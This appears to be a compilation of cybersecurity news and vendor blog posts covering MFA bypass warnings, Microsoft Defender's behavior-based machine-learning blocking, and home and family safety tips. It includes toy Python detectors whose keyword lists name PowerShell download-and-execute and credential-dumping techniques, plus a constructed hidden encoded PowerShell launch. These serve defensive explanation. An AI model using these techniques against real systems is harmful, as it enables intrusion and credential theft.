Organizations agree, building security into digital transformation initiatives is a priority, yet the recommended path to progress is unclear, according to a survey conducted by ZeroNorth. Companies of all sizes and in all industries are experiencing the pains of digital transformation, with 79% of survey respondents indicating their organization already has related initiatives underway. All participants indicate the importance of digital transformation to the future of their organization, even those who have not yet embarked … More

The post Digital transformation requires an aggressive approach to security appeared first on Help Net Security.

FBI Warns of Cyber Attacks on Multi-Factor Authentication

The FBI is warning businesses about a new series of cyberattacks that can circumvent multi-factor authentication (MFA).

In a Private Industry Notification (PIN), the FBI warned businesses that “cyber actors” had been observed “circumventing multi-factor authentication through common social engineering and technical attacks.” The report went on to describe several scenarios where hackers bypassed MFA protections, accessing target networks and stored data. The methods used were SIM swapping, phishing, and newer hacking tools such as Muraena and Necrobrowser.

Multi-factor authentication, where a user’s login and password is supplemented with a token, one-time access code, or other means of verification is widely regarded as an effective baseline for enterprise cybersecurity; a recent study by Microsoft stated that, when deployed properly, it can block 99.9% of attacks on businesses. 

While the FBI still recommends multi-factor authentication, calling it a “strong and effective security measure to protect online accounts,” the PIN suggests boosting their effectiveness via workplace training to identify social engineering scams such as email-based phishing links and phony websites, as well as implementing more sophisticated forms of authentication.

Read the PIN here.

The post FBI Warns of Cyber Attacks on Multi-Factor Authentication appeared first on Adam Levin.

In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks

Our experience in detecting and blocking threats on millions of endpoints tells us that attackers will stop at nothing to circumvent protections. Even one gap in security can be disastrous to an organization.

At Microsoft, we don’t stop finding new ways to fill in gaps in security. We go beyond strengthening existing defenses by introducing new and innovative layers of protection. While our industry-leading endpoint protection platform stops threats before they can even run, we continue improving protections for instances where sophisticated adversarial attacks manage to slip through.

Multiple layers of protection mean multiple hurdles that attackers need to overcome to perpetrate attacks. We continuously innovate threat and malware prevention engines on the client and in the cloud to add more protection layers that detect and block sophisticated and evasive threats before they can even run.

In recent months, we introduced two machine learning protection features within the behavioral blocking and containment capabilities in Microsoft Defender Advanced Threat Protection. In keeping with the defense in depth strategy, coupled with the “assume breach” mindset, these new protection engines specialize in detecting threats by analyzing behavior, and adding new layers of protection after an attack has successfully started running on a machine:

  • Behavior-based machine learning identifies suspicious process behavior sequences and advanced attack techniques observed on the client, which are used as triggers to analyze the process tree behavior using real-time machine learning models in the cloud
  • AMSI-paired machine learning uses pairs of client-side and cloud-side models that integrate with Antimalware Scan Interface (AMSI) to perform advanced analysis of scripting behavior pre- and post-execution to catch advanced threats like fileless and in-memory attacks

The figure below illustrates how the two behavior-based machine learning protections enrich post-breach detections:

Figure 1. Pre and post-execution detection engines in Microsoft Defender ATP’s antivirus capabilities

The pre-execution and post-execution detection engines make up two important components of comprehensive threat and malware prevention. They reflect the defense in depth principle, which entails multiple layers of protection for thorough, wide-range defense.

In detecting post-execution behavior, using machine learning is critical. Many attack techniques are also used by legitimate applications. For example, a very common, documented method used by both clean applications and malware is creating a service for persistence.

To distinguish between malicious and clean applications when an attack technique is observed, Windows Defender Antivirus monitors and sends suspicious behaviors and process trees to the cloud protection service for real-time classification by machine learning. Cloud-based post-execution detection engines isolate known good behaviors from malicious intent to stop attacks in real time.

Within milliseconds of an attack technique or suspicious script execution being observed, machine learning classifiers return a verdict and the client blocks the threat. The pre-execution models then learn from these malicious blocks afterwards to protect Microsoft Defender ATP customers before attacks can begin executing new cycles of infection.

How behavioral blocking and containment protected 100 organizations from credential theft

In early July, attackers launched a highly targeted credential theft attack against 100 organizations around the world, primarily in the United Arab Emirates, Germany, and Portugal. The goal of the attack was to install the notorious info-stealing backdoor Lokibot and to exfiltrate sensitive data.

Behavioral blocking and containment capabilities in Microsoft Defender ATP detected and foiled the attack in its early stages, protecting customers from damage.

Spear-phishing emails carrying lure documents were sent to the target organizations; in one instance, three distinct highly targeted emails with the same lure document were delivered to a single pharmaceutical ingredient supplier. The attacker used pharmaceutical industry jargon to improve the credibility of the email and in one case requested a quote on an ingredient that the target company was likely to produce.

Figure 2. Multiple spear-phishing emails attempted to deliver the same lure document to the same target

The lure document itself didn’t host any exploit code but used an external relationship to a document hosted on a compromised WordPress website. If recipients opened the attachment, the related remote document, which contained the exploit, was also automatically loaded. This allowed the remote document to take advantage of the previously fixed CVE-2017-11882 vulnerability in Equation Editor and execute code on the computer.

Figure 3. The lure document contains an external reference to the exploit document, which is hosted on a compromised WordPress website.

Upon successful exploitation, the attack downloaded and loaded the Lokibot malware, which stole credentials, exfiltrated stolen data, and waited for further instructions from a command-and-control (C&C) server.

The behavior-based machine learning models built into Microsoft Defender ATP caught attacker techniques at two points in the attack chain. The first detection layer spotted the exploit behavior. Machine learning classifiers in the cloud correctly identified the threat and immediately instructed the client to block the attack. In cases where the attack had proceeded past this layer of defense to the next stage of the attack, process hollowing would have been attempted. This, too, was detected by behavior-based machine learning models, which instructed the clients to block the attack, marking the second detection layer. As the attacks are blocked, the malicious processes and corresponding files are remediated, protecting targets from credential theft and further backdoor activities.

Figure 4. Credential theft attack chain showing multiple behavior-based protection layers that disrupted the attack

The behavior-based blocking raised an “Initial Access” alert in Microsoft Defender Security Center, the console for SecOps teams that gives complete visibility into their environments and across the suite of Microsoft Defender ATP tools that protect their endpoints:

Figure 5. Alert and process tree on Microsoft Defender Security Center for this targeted attack

This attack demonstrates how behavior-based machine learning models in the cloud add new layers of protection against attacks even after they have started running.

In the next sections, we will describe in detail the two machine learning protection features in behavioral blocking and containment capabilities in Microsoft Defender ATP.

Behavior-based machine learning protection

The behavior engine in the Windows Defender Antivirus client monitors more than 500 attack techniques as triggers for analyzing new and unknown threats. Each time one of the monitored attack techniques is observed, the process tree and behavior sequences are constructed and sent to the cloud, where behavior-based machine learning models classify possible threats. Figure 6 below illustrates a more detailed view of our process tree classification path:

Figure 6. Process tree classification path

Behavior-based detections are named according to the MITRE ATT&CK matrix to help identify the attack stage where the malicious behavior was observed:

 

Tactic                  Detection threat name
Initial Access          Behavior:Win32/InitialAccess.*!ml
Execution               Behavior:Win32/Execution.*!ml
Persistence             Behavior:Win32/Persistence.*!ml
Privilege Escalation    Behavior:Win32/PrivilegeEscalation.*!ml
Defense Evasion         Behavior:Win32/DefenseEvasion.*!ml
Credential Access       Behavior:Win32/CredentialAccess.*!ml
Discovery               Behavior:Win32/Discovery.*!ml
Lateral Movement        Behavior:Win32/LateralMovement.*!ml
Collection              Behavior:Win32/Collection.*!ml
Command and Control     Behavior:Win32/CommandAndControl.*!ml
Exfiltration            Behavior:Win32/Exfiltration.*!ml
Impact                  Behavior:Win32/Impact.*!ml
Uncategorized           Behavior:Win32/Generic.*!ml

Since deployment, the behavior-based machine learning models have blocked attacker techniques like the following used by attacks in the wild:

  • Credential dumping from LSASS
  • Cross-process injection
  • Process hollowing
  • UAC bypass
  • Tampering with antivirus (such as disabling it or adding the malware as exclusion)
  • Contacting C&C to download payloads
  • Coin mining
  • Boot record modification
  • Pass-the-hash attacks
  • Installation of root certificate
  • Exploitation attempt for various vulnerabilities

These blocked behaviors show up as alerts in Microsoft Defender Security Center.

Figure 7. Alert for malicious behavior in Microsoft Defender Security Center
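The classification path described above, as an added example that is not part of the original post and not Microsoft's code: a monitored technique triggers reconstruction of the process tree and behavior sequence, a rule-based stand-in for the cloud classifier returns an ATT&CK tactic, and the verdict is named in the Behavior:Win32/<Tactic>.*!ml scheme from the table. The process table, event log, trigger names and rules are all constructed; the example also shows the earlier point that service creation is clean when an installer does it and flagged when it comes from an Office-spawned process tree.

```python
"""Toy model of the process-tree classification path: trigger -> process tree
plus behavior sequence -> cloud verdict -> block. Illustrative stand-in only."""
from dataclasses import dataclass

# Hypothetical names for monitored techniques that act as triggers
# (the real engine monitors more than 500 techniques).
TRIGGERS = {"lsass_memory_read", "service_create", "process_hollowing", "c2_download"}

# ATT&CK tactic -> family used in the Behavior:Win32/<Family>.*!ml threat names.
FAMILY = {
    "Credential Access": "CredentialAccess",
    "Persistence": "Persistence",
    "Defense Evasion": "DefenseEvasion",
    "Command and Control": "CommandAndControl",
}
OFFICE_APPS = ("winword.exe", "excel.exe", "outlook.exe")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str


# Constructed process table for one host (not real telemetry).
PROCS = {p.pid: p for p in (
    Proc(4, 0, "System"), Proc(600, 4, "wininit.exe"),
    Proc(700, 600, "services.exe"), Proc(1200, 700, "svchost.exe"),
    Proc(1300, 700, "msiexec.exe"), Proc(3000, 1200, "explorer.exe"),
    Proc(3100, 3000, "winword.exe"), Proc(3200, 3100, "eqnedt32.exe"),
    Proc(3300, 3200, "powershell.exe"),
)}

# Constructed behavior log: (sequence number, pid, behavior) in observed order.
EVENTS = [
    (1, 1300, "file_write"),
    (2, 1300, "service_create"),    # an installer registering a service
    (3, 3100, "open_document"),
    (4, 3200, "child_process_create"),
    (5, 3300, "c2_download"),
    (6, 3300, "process_hollowing"),
    (7, 3300, "lsass_memory_read"),
    (8, 3300, "service_create"),    # the same technique from a malicious tree
]


def ancestors(pid):
    """Process ids from this process up to the root of its tree."""
    chain = []
    while pid in PROCS:
        chain.append(pid)
        pid = PROCS[pid].ppid
    return chain


def process_tree(pid):
    """Image names root -> leaf, as the client reconstructs the tree."""
    return [PROCS[p].image for p in reversed(ancestors(pid))]


def behavior_sequence(pid, events, upto):
    """Behaviors seen on this process and its ancestors, up to the trigger."""
    lineage = set(ancestors(pid))
    return [b for seq, epid, b in events if seq <= upto and epid in lineage]


def cloud_classify(tree, sequence):
    """Rule-based stand-in for the cloud ML classifier. Returns the ATT&CK
    tactic of the triggering behavior, or None when the process-tree context
    is consistent with legitimate software."""
    office_lineage = any(img in OFFICE_APPS for img in tree)
    trigger = sequence[-1]
    if trigger == "lsass_memory_read":
        return "Credential Access"
    if trigger == "process_hollowing":
        return "Defense Evasion"
    if trigger == "c2_download":
        return "Command and Control" if office_lineage else None
    if trigger == "service_create":
        # Installers and malware both create services; only the tree context
        # (here: spawned under an Office app) marks this one malicious.
        return "Persistence" if office_lineage else None
    return None


def threat_name(tactic):
    return f"Behavior:Win32/{FAMILY[tactic]}.A!ml"


def run_client(events=EVENTS):
    """Emulate the client: on each trigger, send tree + sequence to the cloud
    and record every layer at which the attack would have been blocked."""
    verdicts = []
    for seq, pid, behavior in events:
        if behavior not in TRIGGERS:
            continue
        tree = process_tree(pid)
        tactic = cloud_classify(tree, behavior_sequence(pid, events, seq))
        if tactic is not None:
            verdicts.append((seq, tree[-1], threat_name(tactic)))
    return verdicts


if __name__ == "__main__":
    for seq, image, name in run_client():
        print(f"event {seq}: {image} blocked as {name}")
```

The first verdict (event 5) is where the client would actually block; the later ones are the additional layers that would catch the attack had it slipped past the first.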

Machine learning protection for scripting engines with AMSI

Through the AMSI integration with scripting engines on Windows 10 and Office 365, Windows Defender Antivirus gains rich insight into the execution of PowerShell, VBScript, JavaScript and Office Macro VBA scripts to cut through obfuscation, protect against fileless attacks, and provide robust defenses against malicious script behavior.

To counter fileless and evasive script attacks, scripting engines are instrumented to provide both behavior calls and dynamic content calls to the antivirus product. The type of integration available varies by scripting engine. Table 1 below shows the current support in Windows 10 and Office 365, and Figure 8 shows an example of the scripting engine dynamic script content and behavior calls for malicious scripts.

 

Microsoft AMSI integration point    Dynamic script content calls    Behavior calls
PowerShell                          Y                               -
VBScript                            Y                               Y
JavaScript                          Y                               Y
Office VBA macros                   Y                               -
WMI                                 Y                               -
MSIL .NET                           Y                               -

Figure 8. Example dynamic script content and behavior calls for malicious scripts monitored by AMSI

Our scripting machine learning protection design can be seen in Figure 9 below. We deployed paired machine learning models for various scripting scenarios. Each pair of classifiers is made up of (1) a performance-optimized lightweight classifier that runs on the Windows Defender Antivirus client, and (2) a heavy classifier in the cloud. The role of the client-based classifier is to inspect the script content or behavior log to predict whether a script is suspicious. For scripts that are classified as suspicious, metadata describing the behavior or content is featurized and sent up to the cloud for real-time classification; the metadata that describes the content includes expert features, features selected by machine learning, and fuzzy hashes.

Figure 9. AMSI-paired models classification path

The paired machine learning model in the cloud then analyzes the metadata to decide whether the script should be blocked or not. If machine learning decides to block the file, the running script is aborted. This paired model architecture is used to offload the overhead of running intensive machine learning models to the cloud, and to make use of the global information available about the content through the Microsoft Intelligent Security Graph.

Malicious scripts blocked by AMSI-paired machine learning models are reported in Microsoft Defender Security Center using threat names like the following:

  • Trojan:JS/Mountsi.A!ml
  • Trojan:Script/Mountsi.A!ml
  • Trojan:O97M/Mountsi.A!ml
  • Trojan:VBS/Mountsi.A!ml
  • Trojan:PowerShell/Mountsi.A!ml
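The paired-model path described above, as an added example that is not Microsoft's code: a cheap client-side screen on expert features and, only for scripts it flags, featurized metadata (the features plus a simplified piecewise hash standing in for a real fuzzy hash such as ssdeep) handed to a heavier "cloud" scorer whose block verdict is reported under the Trojan:PowerShell/Mountsi.A!ml name listed above. The sample scripts, token list and weights are constructed, and the machine-learning-selected features of the real system are omitted.

```python
"""Toy version of AMSI-paired classification: lightweight client screen,
then featurized metadata scored by a heavier 'cloud' stage. Stand-in only."""
import base64
import hashlib
import re

# Expert features: constructed indicators common in obfuscated script launches.
SUSPICIOUS_TOKENS = ("-encodedcommand", "invoke-expression", "frombase64string",
                     "downloadstring", "-executionpolicy bypass")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def fuzzy_hash(script, chunk=16):
    """Simplified piecewise hash (stand-in for a real fuzzy hash): normalize
    case and whitespace, then keep one hex digit of SHA-256 per fixed-size
    chunk, so scripts differing in a few chunks share most of the digest."""
    norm = re.sub(r"\s+", " ", script.lower()).strip()
    chunks = [norm[i:i + chunk] for i in range(0, len(norm), chunk)]
    return "".join(hashlib.sha256(c.encode()).hexdigest()[0] for c in chunks)


def expert_features(script):
    lowered = script.lower()
    runs = [len(m.group(0)) for m in B64_RUN.finditer(script)]
    return {
        "length": len(script),
        "token_hits": sum(tok in lowered for tok in SUSPICIOUS_TOKENS),
        "longest_b64_run": max(runs, default=0),
        "hidden_window": "-w hidden" in lowered or "-windowstyle hidden" in lowered,
    }


def client_classifier(feats):
    """Lightweight client-side screen: cheap enough to run on every script.
    Anything it does not flag is allowed without a cloud round trip."""
    return feats["token_hits"] > 0 or feats["longest_b64_run"] >= 40


def cloud_classifier(metadata):
    """Heavier 'cloud' stage scoring the featurized metadata.
    The weights and threshold are constructed for this example."""
    f = metadata["features"]
    score = (2 * f["token_hits"]
             + 2 * int(f["longest_b64_run"] >= 40)
             + int(f["hidden_window"]))
    return "block" if score >= 3 else "allow"


def amsi_scan(script):
    """Return which stage decided, the verdict, and the reported threat name."""
    feats = expert_features(script)
    if not client_classifier(feats):
        return {"stage": "client", "verdict": "allow", "threat": None}
    metadata = {"features": feats, "fuzzy_hash": fuzzy_hash(script)}
    verdict = cloud_classifier(metadata)  # a block aborts the running script
    threat = "Trojan:PowerShell/Mountsi.A!ml" if verdict == "block" else None
    return {"stage": "cloud", "verdict": verdict, "threat": threat}


# Constructed samples (not real malware). The encoded command wraps a harmless
# Write-Output so the example carries no live payload.
BENIGN = "Get-ChildItem -Path C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }"
ADMIN_IEX = "$cmd = Get-Content .\\setup.ps1 -Raw; Invoke-Expression $cmd"
ENCODED = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
OBFUSCATED = f"powershell -NoP -W Hidden -EncodedCommand {ENCODED}"

if __name__ == "__main__":
    for name, script in (("benign", BENIGN), ("admin", ADMIN_IEX), ("obfuscated", OBFUSCATED)):
        print(name, amsi_scan(script))
```

The admin script shows the offload in action: the client flags it for the single Invoke-Expression, but the cloud stage allows it, while the hidden-window encoded launch is blocked.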

Behavioral blocking and containment for disrupting advanced attacks

The two new cloud-based post-execution detection engines we described in this blog are part of the behavioral blocking and containment capabilities that enabled Microsoft Defender ATP to protect the 100 organizations targeted in the credential theft attack we discussed earlier. Recently, we also documented how behavior-based protections are important components of the dynamic protection against the multi-stage, fileless Nodersok campaign.

These engines add to the many layers of machine learning-driven protections in the cloud and add protection against threats after they have begun running. To further illustrate how these behavior-based protections work, here’s a diagram that shows the multiple protection layers against an Emotet attack chain:

Figure 10. Multiple layers of behavior-based protection in Windows Defender Antivirus while executing an Emotet attack (SHA-256: ee2bbe2398be8a1732c0afc318b797f192ce898982bff1b109005615588facb0)

As part of our defense in depth strategy, these new layers of antivirus protection not only expand detection and blocking capabilities; they also provide even richer visibility into malicious behavior sequences, giving security operations more signals to use in investigating and responding to attacks through Microsoft Defender ATP capabilities like endpoint detection and response, threat and vulnerability management, and automated investigation and remediation.

Within milliseconds of an attack technique or suspicious script execution being observed, machine learning classifiers return a verdict and the client blocks the threat. Our pre-execution models then learn from these malicious blocks afterwards to protect Microsoft Defender ATP customers before the threats even begin executing.

Figure 11. Multiple layers of malware and threat prevention engines on the client and in the cloud

The impact of the continuous improvements in antivirus capabilities also shows up in Microsoft Threat Protection, Microsoft’s comprehensive security solution for identities, endpoints, email and data, apps, and infrastructure. Through signal-sharing across Microsoft services, the richer machine learning-driven protection in Microsoft Defender ATP is amplified throughout protections for various attack surfaces.

 

Geoff McDonald
with Saad Khan
Microsoft Defender ATP Research

The post In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks appeared first on Microsoft Security.

Unmask cybercriminals through identity attribution

Organized crime has grown more complex since the turn of the century—coinciding with the rise of the digital world, cybercriminals have leveraged the proliferation of technology to broaden their reach with a more sophisticated network-structured model, effectively globalizing their operations in cyberspace and ultimately allowing cybercriminals to devastate companies and consumers alike. The faster you act, the quicker you will be able to disrupt the adversary and prevent future attacks, directly yielding greater financial savings … More

The post Unmask cybercriminals through identity attribution appeared first on Help Net Security.

Product showcase: Awake Security Network Traffic Analysis Platform

Security experts profess that enterprise organizations must assume their network is already compromised. Cyber-attacks use network communications for malware distribution, command and control, and data exfiltration. With the right tools, security professionals should be able to uncover malicious activity and take prompt action to mitigate it. Network traffic analysis (NTA) tools were designed to help security personnel to detect attackers that had managed to evade traditional defenses, especially those that are already inside the perimeter. … More

The post Product showcase: Awake Security Network Traffic Analysis Platform appeared first on Help Net Security.

Organizations need tools that support DevOps security

Organizational silos create unnecessary security risk for global businesses. The lack of security involvement in DevOps projects was reportedly creating cyber risk for 72% of IT leaders, according to Trend Micro. In an effort to better understand the DevOps culture, Trend Micro commissioned Vanson Bourne to poll 1,310 IT decision makers in SMB and enterprise organizations across the globe about their organizational culture. “It’s no secret that developers and security teams have a history of … More

The post Organizations need tools that support DevOps security appeared first on Help Net Security.

Internal user mistakes create large percentage of cybersecurity incidents

Internal user mistakes created the largest percentage of cybersecurity incidents over the past twelve months (80%), followed by exposures caused by poor network system or application security (36%), and external threat actors infiltrating the organization’s network or systems (31%), SolarWinds research reveals. Poor password management ranked as the leading cause of concern for German IT professionals regarding insider threats. Forty-five percent of tech pros surveyed indicated poor password management or weak passwords as the most … More

The post Internal user mistakes create large percentage of cybersecurity incidents appeared first on Help Net Security.

Bringing Cybersecurity Home

October is Cybersecurity Awareness Month, reminding us that cyber-attacks know no boundaries between work and home, so we need to be diligent about cyber hygiene across all environments. With the abundance of connected devices we all depend on, protecting your digital footprint is no longer optional. But where do you learn what to do?

People who work for larger corporations may receive cyber information and training from their employer. For instance, at Cisco every employee gets basic cyber training and increasingly advanced training based on their role; we even share educational materials on applying best practices at home. But not all businesses have the resources to dedicate to such training. And in the home, most people have limited cyber knowledge at best, and only pay attention if or when they become victims of an attack.

To get you started, here are a few tips that will help you to “own IT, protect IT and secure IT” to stay safe online.

Recognize we are experiencing radical change. With our busy lives, we take technology for granted. But it’s important to realize that technology is changing society faster than any other advance in human history. Adults need to get smart about the implications and actively discuss “today’s digital reality” with their children. Just as you teach a toddler to avoid a hot stove, teach them from an early age about safe online practices.

Ask questions. When you acquire a new connected device, stop and ask where it came from. Who connects with it and/or captures data from it? For what purpose do they collect the data, and is that important to you? How do they protect your data and privacy? The more knowledgeable you become, the smarter your next questions will be.

Maintain your devices. Find out whether the device you’re buying has software that will need to be updated and patched as vulnerabilities are found and fixed. If so, make sure that gets done. Just as not replacing expired batteries in a smoke alarm leaves you unprotected, running outdated, insecure software won’t keep you safe.

Secure and protect passwords. Make your passwords long and complex; change them regularly; don’t use the same password for multiple applications; change the default passwords on new devices. We all know multiple passwords can get cumbersome and hard to remember, so use a reputable password manager to keep track of them for you. Many businesses and institutions offer two-factor authentication (2FA) as an added step to protect your online identity and data. If it’s offered, use it.

Embrace technology, but be aware. If you were walking down a dark street in an unfamiliar city, you’d likely be more aware of who else is around you or may be following you. Treat the internet the same way. Being connected does not mean bad things will happen, but it pays to stay alert and to understand best practices and how to apply them. For instance, don’t open email attachments if you’re not completely sure of the sender’s trustworthiness. Don’t click on emailed links that you haven’t asked for. “Stop, think before you click” to avoid the burden of what may follow a malicious attack.

Remember Data Privacy. While security and privacy are different, they’re definitely related. When you’re watching for online threats, also remember that nothing online is really ‘free’ – you’re most likely giving up something (data) to get a “free service/app”.  Ask – is the intrinsic value of the “free” thing worth it? When you download an app or sign up for a new service that collects your data, choose carefully what sharing you allow. And remember, when you put personal information online, it stays around for a long time and may come back to you in unexpected, and unwelcome, ways.

It’s time to bring cybersecurity into the greater social consciousness and into constructive discussions about changing norms. As new capabilities keep coming to market faster, we can and should adapt socially so that we embrace technology safely.

Additional Resources

Tips to help improve your cyber-hygiene (Infographic)

Trust.cisco.com


2020: A new paradigm in Cybersecurity


As we enter a new decade, it is important to look back and learn from the decade that is about to end. From 2010 to 2019, cybersecurity moved at a furious pace. Threats erupted in multiple new vectors, spreading far and wide and shutting down thousands of organizations at the blink of an eye.

State-sponsored cybersecurity threats became an imminent danger, with governments waking up to the sheer scale of the damage they caused. Social media giants were increasingly viewed with suspicion by regulators over how they use the data of their users.

The terms ‘Dark Web’ and ‘Deep Web’ have become common among not just cybersecurity specialists, but also regular users.

A new era of cybersecurity

Looking at that pace of change, one thing is quite certain – 2020 and the start of the next decade will bring about a new paradigm in cybersecurity.

This paradigm shift is likely to be driven by the fear of the damage that cyberattacks can cause. One figure estimates that the cost of cyber attacks to the world will rise to $6 trillion by 2020. A key factor in that calculation is the unprecedented rise of connected devices.

As the world moves to an Internet of Things (IoT) era, an increasing number of devices will be connected to the Internet, enabling a more customized user experience. That, however, also increases the number of devices at risk of cyberattacks. Gartner estimates the number of Internet-connected devices to be 20 billion by 2020.

The role of the state will increase

Expect the role of the state in regulating cybersecurity to increase mainly because cyberattacks are starting to affect nation-states on a larger scale. The biggest countries in the world have instituted cybersecurity departments, recognizing the need to defend themselves against cyber warfare. Experts speculate that cyber threats could pose all sorts of problems for countries, with physical repercussions as well – imagine a cyber attack on a national power grid by an enemy state, wiping out the power system of thousands of homes and causing an emergency.

Recognizing the risks, governments will try to bring in more regulations for domains that have traditionally operated largely unregulated until now. It will be a challenge for enterprises to stay abreast of regulations and maintain compliance.

Data privacy and the questions around it

Few other organizations had a more action-packed decade than Facebook. As a social media behemoth, Mark Zuckerberg’s company rose to dizzying heights before being engulfed in scandals that caused it to be viewed with suspicion. The lesson from this debacle is clear – there is now a renewed awareness of the importance of the data users provide to enterprises. Don’t expect this trend to subside any time soon – enterprises will have to deal with more questions on exactly what they are doing with the data they collect, and how.

The race towards automation as a tool to prevent cyber attacks

Automation is already being explored as a tool to combat cyber attacks. A 2019 Ponemon survey observed that 79% of respondents from 1,400 IT and IT security practitioners across the UK, US and APAC were in organizations which currently used or planned to use automation within the next three years. These respondents also said that log analysis would be the most common type of security activity that would be automated in the next three years, followed by malware analysis and threat hunting.

Automation will help reduce the load on Information Security teams that are already suffering from a skills shortage, by taking over time-consuming, manual and mundane tasks.

Artificial Intelligence – in attack and defence

Artificial intelligence will be a double-edged sword in 2020 and beyond. AI-powered cybersecurity solutions, in coordination with human intelligence, will continue to be extremely useful when dealing with large amounts of data. AI solutions can analyze this data to find patterns and anomalies, helping analysts understand the environment. In this way they can learn what “normal” looks like, reduce false positives, and flag events that deviate from the norm.

In the same vein though, the usage of AI in launching cyber attacks will also increase. Cybercriminals also use AI to run their own research and find loopholes in enterprises. Cybercriminals can also use AI to scan through huge tracts of data quickly and find Personally Identifiable Information (PII) which can be a major cybersecurity risk.

The year 2020 promises to mark a paradigm shift in the world of cybersecurity, giving rise to new solutions, new threats and new means of tackling them.

To share actionable insights on Cybersecurity at the dawn of 2020, Seqrite has put together an exclusive summit for knowledge sharing on the future of Cybersecurity.

The post 2020: A new paradigm in Cybersecurity appeared first on Seqrite Blog.

NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work

October is National Cyber Security Awareness Month (NCSAM). NCSAM is a great initiative to help educate and inform our friends and family on the importance of taking your digital security seriously. To help continue to support this initiative, we asked a range of industry experts to share some of their tips to help us stay […]… Read More

The post NCSAM: It’s Everyone’s Job to Ensure Online Safety at Work appeared first on The State of Security.

Cloud-native applications need a unified continuous security approach

Cloud-native has arrived and now, it’s taking over. By 2021, 92% of companies will go cloud-native. It’s faster, it’s more efficient, more scalable, and more flexible. But is it more secure? As businesses integrate cloud-native technologies, such as Kubernetes, across their clouds, the complexity and distributed nature of these platforms increasingly require companies to rethink their approach not only to Dev and Ops, but also, security. The primary cloud platforms – AWS, Azure and Google … More

The post Cloud-native applications need a unified continuous security approach appeared first on Help Net Security.

Consumers have concerns about cybersecurity, value education on best practices

Nearly three-quarters of consumers (74%) would be likely to participate in a cybersecurity awareness or education program from their financial institution if they offered it. The survey conducted by The Harris Poll on behalf of Computer Services also found that an overwhelming majority of consumers (92%) have concerns about the security of their personal confidential data online. The poll ran online July 1-3, 2019, and it represents feedback from more than 2,000 U.S. adults ages … More

The post Consumers have concerns about cybersecurity, value education on best practices appeared first on Help Net Security.

The top 10 strategic government technology trends CIOs should plan for

The top 10 government technology trends for 2019-2020 that have the potential to optimize or transform public services have been identified by Gartner. Government CIOs should include these trends in their strategic planning over the next 12 to 18 months. The top 10 strategic technology trends for government were selected in response to pressing public policy goals and business needs of government organizations in jurisdictions around the globe. They fit into a broader set of … More

The post The top 10 strategic government technology trends CIOs should plan for appeared first on Help Net Security.

64% of IT decision makers have reported a breach in their ERP systems in the past 24 months

ERP applications are ‘critical’ to business operations, according to the IDC survey of 430 IT decision makers. ERP-related breach. Sixty-four percent of the 191 decision makers surveyed whose organizations rely on SAP or Oracle E-Business Suite confirmed that their deployments have had an ERP-related breach in the last 24 months. “Enterprise Resource Planning (ERP) applications such as Oracle E-Business Suite and SAP (ECC) can be foundational for businesses. A breach of such critical ERP applications … More

The post 64% of IT decision makers have reported a breach in their ERP systems in the past 24 months appeared first on Help Net Security.

Device & App Safety Guide for Families

While we talk about online safety each week on this blog, October is National Cybersecurity Awareness Month (NCSAM), a time to come together and turn up the volume on the digital safety and security conversation worldwide.

To kick off that effort, here’s a comprehensive Device and App Safety Guide to give your family quick ways to boost safety and security.

Device Safety Tips

  • Update devices. Updates play a critical role in protecting family devices from hackers and malware, so check for updates and install promptly.
  • Disable geotagging. To keep photo data private, turn off geotagging, the feature that embeds location information into the metadata of digital photos.
  • Turn off location services. To safeguard personal activity from apps, turn off location services on all devices and within the app. 
  • Review phone records. Monitor your child’s cell phone records for unknown numbers or excessive late-night texting or calls.
  • Lock devices. Most every phone comes with a passcode, facial, or fingerprint lock. Make locking devices a habit and don’t share passcodes with friends. 
  • Add ICE to contacts. Make sure to put a parent’s name followed by ICE (in case of emergency) into each child’s contact list.
  • Back up data. To secure family photos and prevent data loss due to malware, viruses, or theft, regularly back up family data. 
  • Use strong passwords. Passwords should be more than eight characters in length and contain a mix of capital and lower case letters and at least one numeric or non-alphabetical character. Also, use two-factor authentication whenever possible.  
  • Stop spying. Adopting healthy online habits takes a full-court family press, so choose to equip over spying. Talk candidly about online risks, solutions, family ground rules, and consequences. If you monitor devices, make sure your child understands why. 
  • Share wisely. Discuss the risks of sharing photos online with your kids and the effect it has on reputation now and in the future. 
  • Protect your devices. Add an extra layer of protection to family devices with anti-virus and malware protection, and consider content filtering.
  • Secure IoT devices. IoT devices such as smart TVs, toys, smart speakers, and wearables are also part of the devices families need to safeguard. Configure privacy settings, read product reviews, secure your router, use a firewall, and use strong passwords at all connection points. 

App Safety Tips

  • Evaluate apps. Apps have been known to put malware on devices, spy, grab data illegally, and track location and purchasing data without permission. Check app reviews for potential dangers and respect app age requirements.
  • Max privacy settings. Always choose the least amount of data-sharing possible within every app and make app profiles private.
  • Explore apps together. Learn about your child’s favorite apps, what the risks are, and how to adjust app settings to make them as safe as possible. Look at the apps on your child’s phone. Also, ask your child questions about his or her favorite apps and download and explore the app yourself. 
  • Understand app cultures. Some of the most popular social networking apps can also contain inappropriate content that promotes pornography, hate, racism, violence, cruelty, self-harm, or even terrorism.
  • Monitor gaming. Many games allow real-time in-game messaging. Players can chat using text, audio, and video, which presents the same potential safety concerns as other social and messaging apps.
  • Discuss app risks. New, popular apps come out every week. Discuss risks such as anonymous bullying, inappropriate content, sexting, fake profiles, and data stealing. 
  • Avoid anonymous apps. Dozens of apps allow users to create anonymous profiles. Avoid these apps and the inherent cyberbullying risks they pose.
  • Limit your digital circle. Only accept friend requests from people you know. And remember, “friends” aren’t always who they say they are. Review and reduce your friend list regularly.
  • Monitor in-app purchases. It’s easy for kids to go overboard with in-app purchases, especially on gaming apps.

Our biggest tip? Keep on talking. Talk about the risks inherent to the internet. Talk about personal situations that arise. Talk about mistakes. Nurturing honest, ongoing family dialogue takes time and effort but the payoff is knowing your kids can handle any situation they encounter online.

Stay tuned throughout October for more NCSAM highlights and information designed to help you keep your family safe and secure in the online world.

The post Device & App Safety Guide for Families appeared first on McAfee Blogs.

Is Your Browser Haunted With Ghostcat Malware?

